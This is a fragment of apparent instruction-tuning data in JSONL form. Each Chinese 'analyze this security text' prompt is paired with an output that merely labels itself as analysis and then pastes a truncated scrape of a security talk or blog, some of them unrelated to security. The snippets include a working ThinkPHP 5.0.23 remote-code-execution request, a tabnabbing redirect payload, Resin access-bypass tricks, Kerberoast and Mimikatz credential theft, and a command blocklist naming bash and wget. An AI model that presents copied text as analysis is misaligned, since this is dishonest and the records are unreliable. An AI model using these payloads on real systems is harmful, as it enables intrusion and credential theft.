CERT teams  Coordination and implementation of the National Cyber Security Strategy and related Action Plan  Protection of critical information infrastructure and other important systems (helping them to protect themselves)  Preparation of exercises and education projects  Analysis and monitoring of cyber threats  International cooperation DRAFT - DO NOT QUOTE  Outline of the institutional framework for cybersecurity in the Czech Republic  Non-technical exercises and its relevance for decision making process  Strategic analysis helps decision makers to understand cybersecurity DRAFT - DO NOT QUOTE DRAFT - DO NOT QUOTE  Even relatively simple setup involves number of agencies across government sector  There is a ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## 5. 中介者Mediator ### Intent 集中相关对象之间复杂的沟通和控制方式 ### Class Diagram - Mediator中介者定义一个接口用于与各同事Colleague对象通信 - Colleague同事相关对象 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/30d6e95c-2e3c-4d32-bf4f-68128a70bc05.png\"/> </div><br> ### Implementation Alarm闹钟CoffeePot咖啡壶Calendar日历Sprinkler喷头是一组相关的对象在某个对象的事件产生时需要去操作其它对象形成了下面这种依赖结构 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/82cfda3b-b53b-4c89-9fdb-26dd2db0cd02.jpg\"/> </div><br> 使用中介者模式可以将复杂的依赖结构变成星形结构 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/5359cbf5-5a79-4874-9b17-f23c53c2cb80.jpg\"/> </div><br> ```java public abstract class Colleague { public abstract void onEvent(Mediator mediator); } ``` ```java public class Alarm extends Colleague { @Override public void onEvent(Mediator mediator) { mediator.doEvent(\"alarm\"); } public void doAlarm() { System.out.println(\"doAlarm()\"); } } ``` ```java public class CoffeePot extends Colleague { @Override public void onEvent(Mediator mediator) { mediator.doEvent(\"coffeePot\"); } public void doCoffeePot() { System.out.println(\"doCoffeePot()\"); } } ``` ```java public class Calender extends Colleague { @Override public void onEvent(Mediator mediator) { mediator.doEvent(\"calender\"); } public void doCalender() { System.out.println(\"doCalender()\"); } } ``` ```java public class Sprinkler extends Colleague { @Override public void onEvent(Mediator mediator) { mediator.doEvent(\"sprinkler\"); } public void doSprinkler() { System.out.println(\"doSprinkler()\"); } } ``` ```java public abstract class Mediator { public abstract void doEvent(String eventType); } ``` ```java public class ConcreteMediator extends Mediator { private Alarm alarm; private CoffeePot coffeePot; private Calender calender; private Sprinkler sprinkler; public ConcreteMediator(Alarm alarm, CoffeePot coffeePot, Calender calender, Sprinkler sprinkler) { this.alarm = alarm; this.coffeePot = coffeePot; this.ca", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n本篇文章翻译自Offensive WMI - Exploring Namespaces, Classes & Methods (Part 2) :: 0xInfection's Blog  Random ramblings of an Infected Geek. 本篇文章是 WMI 攻击手法研究的第二篇主要研究 WMI 中的 3 个组件在整篇文章中我们将交替使 用 WMI 和 CIM cmdlet以便熟悉这两种 cmdlet 类型 一命名空间 让我们简单回顾一下命名空间是什么 命名空间结构信息类似于文件系统中文件夹但是与物理位置 (例如磁盘上) 不同它们本质上 更具有逻辑 WMI 中的所有命名空间都是 __Namespace 系统类的实例要获取 root 命名空间下所有命名空间的列 表可使用以下命令查询同一个类 Get-WmiObject -Namespace root -Class __Namespace 输出的内容包含了许多信息为了过滤掉 \"无用\" 信息可使用 PowerShell 中的 select  现在我们从系统中得到一个命名空间的列表许多命名空间会是这样格式出现 root\\<namespace> 比 如 root\\DEFAULT  root\\CIM2 等等因为它们是 root (本身也是一个命名空间) 下的命名空间 注意一个奇怪而有趣的事实是WMI 中的默认命名空间不是 root\\DeFAULT 而是 root\\CIMV2 (自 Windows 2000 以来一直是这样) 使用 CIM cmdlet Get-CimInstance 可以实现相同目的 Get-WmiObject -Namespace root -Class __Namespace | select name Get-CimInstance -Namespace root -ClassName __Namespace OK上面已整整齐齐列出来了那嵌套的名称空间呢我们已经看到 root 命名空间下有几个命名空 间只需要编写一个脚本递归地获取名称空间 (来自 PSMag) 注意类和命名空间可能因机器而异具体取决于可用硬件安装的应用程序和许多其它因素 二类 现在我们有一个可用的命名空间列表让我们来看看类那么什么是类 WMI 类表示系统中的特定项它可以是从系统进程到硬件 (比如网卡)服务等任何内容 类分为 3 个主要类型 (这是 CIM 标准的要求) Function Get-WmiNamespace { Param ( $Namespace='root' ) Get-WmiObject -Namespace $Namespace -Class __NAMESPACE | ForEach-Object { ($ns = '{0}\\{1}' -f $_.__NAMESPACE,$_.Name) Get-WmiNamespace $ns } } Core classes (核心类)适用于所有管理领域并提供很少的基本功能它们通常以双下划线开头 (比如 __SystemSecrity ) Common classes (公共类)这些是核心类的扩展适用于特定的管理领域以 CIM_ 为前缀 (比如 CIM_TemperatureSensor ) Extended classes (扩展类)这些是对基于技术堆栈的常见类的额外添加 (例如 Win32_Process) 类进一步分为以下类型 Abstract classes (抽象类)定义新类的模板 Static classes (静态类)主要用于存储数据 Dynamic classes (动态类)从 Provider 取回数据代表 WMI 托管资源我们最感兴趣的是这种 类型的类 Association classes (关联类)描述类和托管资源之间的关系 2.1 列出类 有了足够的理论支撑让我们尝试寻找一些类我们可以使用 Get-WmiObject cmdlet 列出可用的类 上面这条命令将会列出所有类但为了举例假设我们对系统上的用户感兴趣可以使用以下命令来缩 小范围该命令列出了用于获取或操作用户信息的所有可用类 同样也可以使用 Get-CimClass 命令也能实现同样的效果如下所示 Get-WmiObject -Class * -List Get-WmiObject -Class *user* -List Get-CimClass -ClassName *user* 注意有关所有 Win32 类的列表可以参考 Microsoft 的类文档 Win32 Provider 提供 4 个不 同类别的类计算机系统硬件类操作系统类性能计数器类和 WMI 服务管理类 若要获取动态类可以使用 Get-CimClass cmdlet ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 OLONLTLW-奇葩的Resin 前 从其他两个tips说起 N./test%OL/test.jsp O./test/#/../test.jsp 三其他些tips N.对/test$$/test.jsp进fuzz O.对/test/test.jsp$$进fuzz P.对/test//test.jsp进fuzz 记录今天在做JavaWeb的权限绕过总结时发现Resin的些tips 个是某微oa/services%20/WorkflowServiceXml 个是rr在知识星球发的个tips关于#来绕nginx的403 测试发现tomcat这两个tips都不能某微使的Resin于是搭了个Resin开始测试 直接在resin官下了个最新版测试的 前 从其他两个tips说起 1./test%20/test.jsp 2./test/#/../test.jsp 2 对此处进fuzz 三其他些tips 1.对/test$$/test.jsp进fuzz 3 发现%2e,%2f,%3b,%5c都能起到%20的效果 分号后可以随意加字符tomcat也 2.对/test/test.jsp$$进fuzz 4 发现和上的结果样 且发现%2f,%5c,%3b后可以跟随意字符 5 3.对/test//test.jsp进fuzz 6", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRed vs. Blue: Modern Active Directory Attacks & Defense Sean Metcalf CTO DAn Solutions sean [@] dansolutions . com http://DAnSolutions.com http://www.ADSecurity.org Photo by Ed Speir IV. All Rights Reserved. Used with Permission. ABOUT Chief Technology Officer - DAn Solutions Microsoft Certified Master (MCM) Directory Services Security Researcher / Purple Team Security Info -> ADSecurity.org AGENDA Red Team (Recon, Escalate, Persist) Blue Team (Detect, Mitigate, Prevent) Kerberos TGT Ticket Kerberos Overview Kerberos Key Points NTLM password used for Kerberos RC4 encryption. Logon Ticket (TGT) proves prior user auth to DC. Kerberos policy only checked at TGT creation DC only validates user account when TGT > 20 mins. Service Ticket (TGS) PAC validation is optional & rare. Red Team (Offense) SPN Scanning Service Discovery SQL servers, instances, ports, etc. MSSQLSvc/adsmsSQLAP01.adsecurity.org:1433 Exchange Client Access Servers exchangeMDB/adsmsEXCAS01.adsecurity.org RDP TERMSERV/adsmsEXCAS01.adsecurity.org Going from N/A to DA (Domain Admin) Poor Service Account Passwords Passwords in SYSVOL Credential Theft Misconfiguration / Incorrect Perms Exploit Vulnerability SPN Scanning for Service Accounts with Find-PSServiceAccounts SPN Directory: http://adsecurity.org/?page_id=183 Cracking Service Account Passwords (Kerberoast) Request/Save TGS service tickets & crack offline. Kerberoast python-based TGS password cracker. No elevated rights required. No traffic sent to target. Kerberoast: Request TGS Service Ticket Kerberoast: Save & Crack TGS Service Ticket Exploiting Group Policy Preferences \\\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\ Mimikatz: The Credential Multi-tool Dump credentials Windows protected memory (LSASS). * Active Directory Domain Controller database . * Dump Kerberos tickets for all users. * for current user. Credential Injection Password hash (pass-the-hash) Kerberos ticket (pass-the-ticket) Generate Silver and/or Golden tickets And so much more! Dump Credenti", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Tabnabbing ## Introduction When you open a link in a new tab ( target=\"_blank\" ), the page that opens in a new tab can access the initial tab and change it's location using the window.opener property. ## How to find ```html <a href=\"...\" target=\"_blank\" rel=\"\" /> <a href=\"...\" target=\"_blank\" /> ``` ## How to Exploit 1. Attacker posts a link to a website under his control that contains the following JS code: ```html <html> <script> if (window.opener) window.opener.parent.location.replace('http://evil.com'); if (window.parent != window) window.parent.location.replace('http://evil.com'); </script> </html> ``` 2. He tricks the victim into visiting the link, which is opened in the browser in a new tab. 3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website. ## References * [Hackerone #260278](https://hackerone.com/reports/260278)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHITCON PACIFIC 2017 ICS/SCADA Cybersecurity and IT Cybersecurity: Comparing Apples and Oranges Presented by David Ong | CEO of Attila Cybertech 8 December 2017 2 2  But there are also unknown unknowns. There are things we dont know we dont know. Donald Rumsfeld, former Secretary of Defence Quote by Donald Rumsfeld 3 David Ong, Entrepreneur and Founder of Excel Marco Group, a successful Industrial Automation Integrator and Attila Cybertech, a Operational Technology (OT) cyber security firm. With over 20 years of professional experience and is widely recognized as an active professional in process automation safety industries. Biography About Attila Cybertech  Cyber Security in Operational Technology (OT)  Data Analytics for Plant and Factory Optimization  OT and IT Integration for the Critical Information Infrastructure Sectors (CII) To be a leader in creating resilient Cyber Ecosystem  that is safe and transformational for humanity  To help create Cyber-Resilience Critical Information Infrastructure (CII) and to inspire Data Analytics application using Artificial Intelligence   VISION MISSION 3  Terminology  Types of ICS  The Need to Secure ICS  IT-OT Convergence  Challenges in IT-OT Convergence  Standards & Best Practices for ICS  ICS Cyber Security Assessment  Cyber Security Assessment & Tool  ICS Security Architecture  Industrial Protocols  Security Application for ICS  Q & A 4 VS IT OT ICS/SCADA Cyber security and IT Cybersecurity Comparing Apples and Oranges OT is hardware and software that detects or causes a change through the direct monitoring and/or control of physical devices, processes and events in the enterprise. (Gartner) OT is a category of hardware and software that monitors and controls how physical devices perform. (SearchData.com) OT is the hardware and software dedicated to detecting or causing changes in physical processes through direct monitoring and/or control of physical devices such as valves, pumps, etc. (Wikipedia) 5 What is Operational T", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Darknet of Things Building Sensor Networks to do our bidding. Introductions Anch - anch@subba.net @boneheadsanon Omega - omega@omegacs.net The Internet of Things Things... No, Not your fridge. An Internet of things, not things on the Internet. Sensor Networks What are they What they (are supposed to) do What they are used for (usually) The Network part of Sensor Networks ZigBee (802.15.4) LowPower Wireless Network Advantages Limitations 6LowPan 802.15.4 (Yup, Runs on top of ZigBee MAC) IPv6 for Low Power Wireless Advantages Limitations So... What are we doing here... The Project Build a Darknet... of Things A darknet of things Something fun to build Hardware hacking taken to the next level build the largest free-roaming sensor network in the world. (DC21?!) A project for the community to work on Considerations NO ARDUINO Overdone People already know it (lets learn something new) Processors arent powerful enough. (to really do anything interesting) Considerations Must be HACKABLE People need to have fun with it. Modifiable, Changeable, Bendable. But still stable. Considerations Maintainable Fix shit if it b0rk3s. Shit happens. Considerations Must be a network of THINGS (Not things on a network) Wearable/Moveable. Pocketable. Considerations Must work outside of DefCon Needs to be able to work at home/hackerspaces Access-Points/Development boards available The Hardware Darknet Badges... Planned for DefCon 21 2 ARM Micro Processors (1 Main, 1 Network) USB (2 ports, host and client) 2.8 TFT Touch Screen 6LowPan Network Connectivity Battery Powered and Rechargable DarkNet Badges... HACKABLE JTAG Headers and Peripherals Available Hardware Schematics, Software ToolChain etc. Open and Available, and part of a project we are starting today.. More information later. DarkNet Badges... EXPANDABLE SDRAM Pads Available unused peripherals available Dev. Boards and APs Network only development boards Designed to be attached to your projects UART(s) exposed 1 x MC13224v USB + JTAG", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n从一道CTF的非预期解看PHP反斜杠匹配问题 前言 刷buuoj的时候遇到这样一个题做一半看到他这个正则写的有点问题就去翻wp 找到了官方的wp发现果然是个非预期 但是官方wp中并没有深入说明后来看到评论去翻出题人的博客也没找到相关的信息加上看到了其 他wp中一些不准确的说法所以今天就有了这篇文章来讲一讲自己的看法 正文 题目源码 前面md5碰撞已经是老套路了问题出在后面对shell命令的过滤上 熟悉php代码审计的同学应该都知道在preg_match中要过滤 \\ 是需要四个 \\\\\\\\ 才可以达到目的原 理如下 <?php error_reporting(E_ALL || ~ E_NOTICE); header('content-type:text/html;charset=utf-8'); $cmd = $_GET['cmd']; if (!isset($_GET['img']) || !isset($_GET['cmd'])) header('Refresh:0;url=./index.php? img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd='); $file = hex2bin(base64_decode(base64_decode($_GET['img']))); $file = preg_replace(\"/[a-zA-Z0-9.]+/\", \"\", $file); if (preg_match(\"/flag/i\", $file)) { echo '<img src =\"./ctf3.jpeg\">'; die(\"xixi no flag\"); } else { $txt = base64_encode(file_get_contents($file)); echo \"<img src='data:image/gif;base64,\" . $txt . \"'></img>\"; echo \"<br>\"; } echo $cmd; echo \"<br>\"; if (preg_match(\"/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bz more|bzless|pcre|paste|diff|file|echo|sh|\\'|\\\"|\\`|;|,|\\*|\\? |\\\\|\\\\\\\\|\\n|\\t|\\r|\\xA0|\\{|\\}|\\(|\\)|\\&[\\d]|@|\\||\\\\$|\\[|\\]|{|}|\\(|\\)|-| <|>/i\", $cmd)) { echo(\"forbid ~\"); echo \"<br>\"; } else { if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) { echo `$cmd`; } else { echo (\"md5 is funny ~\"); } } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 if (preg_match(\"/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmo re|bzless|pcre|paste|diff|file|echo|sh|\\'|\\\"|\\`|;|,|\\*|\\? |\\\\|\\\\\\\\|\\n|\\t|\\r|\\xA0|\\{|\\}|\\(|\\)|\\&[\\d]|@|\\||\\\\$|\\[|\\]|{|}|\\(|\\)|-|<|>/i\", $cmd)) { echo(\"forbid ~\"); echo \"<br>\"; } 1 2 3 4 但是出题人似乎觉得不够又在后面加了四个反斜杠的匹配似乎本意是要过滤 \\ 跟 \\\\  理论来说已经出现了四个 \\\\\\\\ 了但是为什么还会造成非预期 ca\\t 这种解呢 我们本地测试一下 去掉其他的乱七八糟的东西只留下对于反斜杠等的过滤 可以看到虽然正则中有 \\\\\\\\ 但是却无法过滤到反斜杠 反向思考其原因应该是问题出在前面两个反斜杠的匹配部分 因为正则匹配中相当于要经过两层解析器解析一层是php的一层是正则表达式的所以此处前面的 两个反斜杠经过php解析器处理后应该是表示了一个转义号 \\ 之后又与后面的表示逻辑或的 | 结合到 一起从而在正则表达式解析器中解析为 \\| 又因为 | 是正则中的保留符号所以需要一个转义符来 转义所以最后的实现效果应为对于字符 | 的过滤 $str = '\\/div'; $pattern = '/\\\\\\\\\\/div/'; // '\\\\\\\\\\/'", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAura A peer-to-peer reputation system Cat Okita, 2003 Reputation Systems  What is a Reputation System?  Livejournal/Friendster, eBay, Advogato, Slashcode  Why do you care?  What could you use this for?  Establishing trust, performance metrics, meme propagation, spam filtering Challenges  Authentication  Trust  Non-repudiation Design Considerations  Fast, resource efficient  Secure - Difficult to corrupt information or impersonate others  Portable - Easy to use from any location  Simple to use and extend (plugins)  Independent - not dependant on a centralized server Attacks  Information poisoning  Flooding  Trojans  Identity theft  Impersonation  DoS Implementation  Peer-to-peer  Local datastore  Can also run as an aggregator  Reputation  overall personal and general, or by specific area  Gossip  information about indirect entities A quick check of Reputation  Picking a mailer  Stable, fast, secure?  Finding out about a poster to a mailing list  Credibility: Crazy, expert, unknown?  Filtering  Personal or server level Configuration  Text-based configuration  Use Templates to describe data format to exchange details  Requires use of public/private key cryptography Future Plans  Pretty GUI  Better cross-platform portability  Improved statistical reporting  Implementation of group keys  Trigger automation Finis  Available at:  http://www.geekness.net/tools/aura  Email to:  aura@geekness.net  Questions???", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfofahub - 1 标签 地址 新增属性 fofahub 未开源 https://hub.fofa.info/ 因为想做个 bugbounty 资产平台所以体验了下 fofahub记录些觉得不错的式 体验 新建项  图标好像是动选取资产范围内的图标 资产导 输范围域名后它能返回资产信息 可能是根据 fofa 结果筛选 fofahub - 2 分析 fofahub - 3 较好的点是能通过分析的结果添加更多资产到资产追踪中例如从证书主域名中添加更多域名从根域名中添加域名 点击些详情后会使搜索语法到资产列表搜索 资产列表是以 ip 为维度域名什么的都是根据 ip 来的这样显示其实有点乱点击 ip跳到 ip 详情显示 ip 绑定的域名端 标题服务等等 fofahub - 4 作流 fofahub 资产收集是地基核是这个 workflow 有点类似 python 的积式编程 可以看到它其中的函数 数据源 资产仓库获取 fofa 获取 络请求 http 请求 渲染 dom 截图 添加 fofa 搜索 协议获取识别 应识别指纹识别 漏洞扫描 数据处理 格式化为 url 排序 去重 图章识别OCR 本分类 数据输出 mysql sqlite excel 输出到仓库 图表 fofahub - 5 胡乱拼了个 fofa 的 workflow就可以不受限的获取数据了 这个时候还没有部署 agent 学习&总结 workflow 动化编排使积式之前也到过使关系图使 docker 函数式编程的式技术上说不清孰好孰坏还是得看谁的户量 的多 像 nuclei 使 yaml 格式编写 poc当官仓库有够量了才能带动其他编写 但是他内置了 fofa来嫖应该不错 ~ 后再内置些其他的数据源加些域名爆破之类的信息收集段就会不错 资产管理 资产部分的数据应该都是来 fofa现在的 fofahub 就只是个展示的效果展示的也挺杂管理相关更没多少 柱状图 饼图 fofahub - 6", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: 列出存储桶里的对象 --- ## 列出存储桶里的对象 使用以下命令可以列出存储桶中的对象 ```bash cf alibaba oss obj ls ``` 如果想指定获取对象的数量可以使用 `-n` 或者 `--number` 参数 ```bash cf alibaba oss obj ls -n 100 ``` 在有些情况下当前 AK 可能会没有列出 Bucket 的权限如果你知道 Bucket 的名称可以使用 `-b` 指定 Bucket ```bash cf alibaba oss ls -b bucket_name ``` 这时可能会碰到没有获取 Bucket 区域的情况加上 `-r` 参数指定区域即可例如指定 cn-hangzhou ```bash cf alibaba oss ls -b bucket_name -r cn-hangzhou ``` <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = \"2022年10月12日\" } } </script>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Buffering 1 Category: Binary Exploitation, 100 points ## Description > The flag distributing service was updated, but now it seems to be buffering foreverrrrr ```c #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include \"flag.h\" int get_credentials(); int authenticate_with_server(int *authenticated); void print_flag(); extern char flag[100]; char spinning_icon[4] = {'/', '-', '\\\\', '|'}; #define USERNAME_LENGTH 32 #define PASSWORD_LENGTH 64 int main() { int authenticated = 0; long int i = 0; printf(\"Hello and thank you for using Flag Distibuter v2.0 \\n\"); get_credentials(); printf(\"Autenticating \"); while (!authenticate_with_server(&authenticated)){ printf(\"\\b%c\", spinning_icon[(i++) % 4]); fflush(stdout); sleep(0.91); } if(authenticated) print_flag(); return 0; } int get_credentials() { char username[USERNAME_LENGTH] = {0}; char password[PASSWORD_LENGTH] = {0}; printf(\"To receive the flag, please enter your username and password\\n\"); printf(\"Username: \"); fflush(stdout); read(STDIN_FILENO, username, PASSWORD_LENGTH); printf(\"Password: \"); fflush(stdout); read(STDIN_FILENO, password, PASSWORD_LENGTH); } void print_flag() { printf(\"Thank you for waiting, here's the flag: %s\\n\", flag); fflush(stdout); exit(0); } int authenticate_with_server(int *authenticated) { /*TODO: add authentication with server*/ return 0; } ``` ## Solution This is the follow-up for [Flag Server](Flag_Server.md). Let's check the diff: ```console (user@kali)-[/media/sf_CTFs/ducky_debug_duck/Buffering_1] $ diff -y ../Flag_Server/flag_server.c buffering_1.c #include <stdio.h> #include <stdio.h> #include <unistd.h> #include <unistd.h> > #include <stdlib.h> #include \"flag.h\" #include \"flag.h\" int get_credentials(); int get_credentials(); int authenticate_with_server(int *authenticated); int authenticate_with_server(int *authenticated); void print_flag(); void print_flag(); extern char flag[100]; extern char flag[100]; > char spinning_icon[4] = {'/', '-', '\\\\', '|'}; #define USERNAME_LEN", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmsfconsole | tee 1.txt  app 0x00 0x01 0x02  while true do if [ ! -n \"$1\" ] ;then keyword=\"successful\" else keyword=$1 fi result=$(tail -n 1 1.txt | grep $keyword) if test ! -z \"$result\"; then wget --output-document=/dev/null \"https://api.day.app/api/find: $result\" sleep 5s fi sleep 0.05 done sh test.sh successful //successful  0x03 0x04", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Copyright (C) 1996 Andries Brouwer (aeb@cwi.nl) .\\\" .\\\" %%%LICENSE_START(VERBATIM) .\\\" Permission is granted to make and distribute verbatim copies of this .\\\" manual provided the copyright notice and this permission notice are .\\\" preserved on all copies. .\\\" .\\\" Permission is granted to copy and distribute modified versions of this .\\\" manual under the conditions for verbatim copying, provided that the .\\\" entire resulting derived work is distributed under the terms of a .\\\" permission notice identical to this one. .\\\" .\\\" Since the Linux kernel and libraries are constantly changing, this .\\\" manual page may be incorrect or out-of-date. The author(s) assume no .\\\" responsibility for errors or omissions, or for damages resulting from .\\\" the use of the information contained herein. The author(s) may not .\\\" have taken the same level of care in the production of this manual, .\\\" which is licensed free of charge, as they might when working .\\\" professionally. .\\\" .\\\" Formatted or processed versions of this manual, if unaccompanied by .\\\" the source, must acknowledge the copyright and authors of this work. .\\\" %%%LICENSE_END .\\\" .\\\" Moved to man3, aeb, 980612 .\\\" .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH ULIMIT 3 2017\\-09\\-15 Linux \"Linux 程序员手册\" .SH 名称 ulimit \\- 获取并设置用户限制 .SH 概述 \\fB#include <ulimit.h>\\fP .PP \\fBlong ulimit(int \\fP\\fIcmd\\fP\\fB, long \\fP\\fInewlimit\\fP\\fB);\\fP .SH 描述 警告该例程已过时请使用 \\fBgetrlimit\\fP(2)\\fBsetrlimit\\fP(2) 和 \\fBsysconf\\fP(3) 代替有关 shell 命令 \\fBulimit\\fP() 请参见 \\fBbash\\fP(1) .PP \\fBulimit\\fP() 调用可以获取或设置调用进程的某些限制\\fIcmd\\fP 参数可以取如下的值 .TP \\fBUL_GETFSIZE\\fP 返回文件大小相关的限制单位为 512 字节 .TP \\fBUL_SETFSIZE\\fP 设置文件大小相关的限制 .TP \\fB3\\fP Linux 未实现返回数据段可能的最大地址 .TP \\fB4\\fP 已实现但未提供符号常量返回调用进程可以打开文件的最大数量 .SH 返回值 如果成功\\fBulimit\\fP() 返回非零值如果出错返回值为 \\-1且将相应设置 \\fIerrno\\fP 的值 .SH 错误 .TP \\fBEPERM\\fP 一个", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# ThinkPHP5 5.0.23 Remote Code Execution Vulnerability [中文版本(Chinese version)](README.zh-cn.md) ThinkPHP is an extremely widely used PHP development framework in China. In its version 5.0(<5.0.24), while obtaining the request method, the framework processes it incorrectly, which allows an attacker to call any method of the Request class, resulting in a RCE vulnerability through a specific exploit chain. References - https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de003 ## Environment Setup Enter the following command(ThinkPHP version: 5.0.23) ``` docker compose up -d ``` Visit `http://your-ip:8080` and you'll see the default page of ThinkPHP. ## POC Send the packets and execute the command `id`: ``` POST /index.php?s=captcha HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 72 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id ``` ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEFCON 22 Eric Smith & Joshua Perrymon LARES ALL YOUR BADGES ARE BELONG TO US AGENDA INTRO WHAT IS RED TEAMING TRADITIONAL ATTACKS/TECHNIQUES RFID OVERVIEW ADVANCED ATTACKS REMEDIATION/RISK MITIGATION ABOUT: LARES CORP  Minimum of 15 years InfoSec Experience per consultant (90+ combined)  Penetration Testing Execution Standard Core Members (PTES)  Publications  Aggressive Network Self Defense  Contributing writer to COBIT  Contributing writer to ISO17799, and one of less than 1000 certified auditors of the ISO17799 (international standards for security best practices)  Authors of multiple national / international security awareness training programs  Blogs/Podcasts/Media/Conferences ABOUT: LARES PRESENTERS TedX InfraGard Defcon BlackHat OWASP SANS BruCon SOURCE ToorCon ISACA/ISSA ShmooCon PHNeutral Dark Reading Security B-Sides ChicagoCon NotaCon White Hat World Sec-T Troopers CSI HackCon Derbycon DakotaCon ShakaCon ABOUT: ERIC SMITH Over 15 years IT/IS experience  Red Team Testing/Physical Security Assessments  Social Engineering  Penetration Testing  Risk Assessments Qualifications  B.Sc. Information Security/CISSP, CISA, CCSA, CCNA Work Experience:  Senior Partner/Principal Security Consultant  Lares Consulting  Senior Partner/Principal Security Consultant  Layer 8 Labs  Senior Security Consultant  Alternative Technology  Application Security Analyst  Equifax, Inc.  Senior Security Consultant  International Network Services  Security Engineer  GE Power Systems  Security Analyst - Bellsouth ABOUT: JOSH PERRYMON Over 15 years IT/IS experience  Risk Assessments  Red Team Testing/Physical Security Assessments  Social Engineering  Vulnerability Assessments & Penetration Testing  Application Assessments  Wireless Security Assessments Qualifications  CEH, OPST, OPSA, OSSTMM Trainer Work Experience:  Senior Adversarial Engineer Lares  Senior Partner  Layer 8 Labs  Advanced Insider Threat/Intel  Bank of America  Red Team Leader Bank of America  CEO PacketFocus  Sr. Consul", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@0x222 Paul Such (SCRT) @Agixid Florian Gaultier (SCRT) PLAYING WITH CAR FIRMWARE (OR HOW TO BRICK YOUR CAR) SUMMARY  Who am I ?  Hacking car firmware , why ?  Model  Hidden menu  Finding the firmware  sources  Analyzing the firmware  Some interesting results  A 2.2 Ton (4400 pounds) brick  Conclusions WHO AM I ?  Name : Paul Such  Twitter : @0x222  Life : Security Engineer and founders of SCRT (A Swiss security company specialized in Ethical hacking, IT security, digital forensics)  Hobbies : Guitarist, mountain biker, fan of motorsport  Organizer of the Swiss security event : Insomnihack (security conferences, CTF,) March 2015  Research done with Florian Gaultier  Twitter : @agixid HACKING CAR FIRMWARE ? WHY ?  Fun and profit !  A lot of researches have already been done regarding CANBUS, OBD2,  Car entertainment system can do much more than entertainment : you can nearly control everything : lights. central locking , air conditioning, GPS, Bluetooth, phone, Wi-Fi, auxiliary heating,   A lot of cars have built-in options that are just software-activated : TV, Wifi, auxiliary heating, sounds interesting (MAIN) MODEL  Car : VW touareg 2  Multimedia : RNS 850 (audi Mmi-3G) GETTING THE FIRMWARE - SOURCES  The hard way : dismount the car , find the disk/flash (in my case -> the drive is inside the glovebox. Note the IDE/PATA interface, not SATA ! )  Buy a RNS850 on Ebay  Social engineering : the VW dealer/mechanic  For some models : update the GPS => could update the firmware (ex : audi TT)  Google is your friend : RNS850 firmware ! UPLOAD/MODIFY THE FIRMWARE  No way but the hard way : direct disk access  Find the magic combo (Press PHONE + SET UP together for 3-5 seconds)  To reboot the RNS850, you need your 5 fingers (Phone+Climate+Nav+Traffic+Button) HIDDEN MENUS HIDDEN MENUS HIDDEN MENUS UPLOAD/MODIFY THE FIRMWARE (2)  Power-user : OBD2 + VAGCOM + combo ANALYSING THE FIRMWARE  Firmware seems to be a mix of EFS & IFS filesystem  We used the tool dumpefs to dump the ", "category": "text_analysis", "source": "security_papers"}
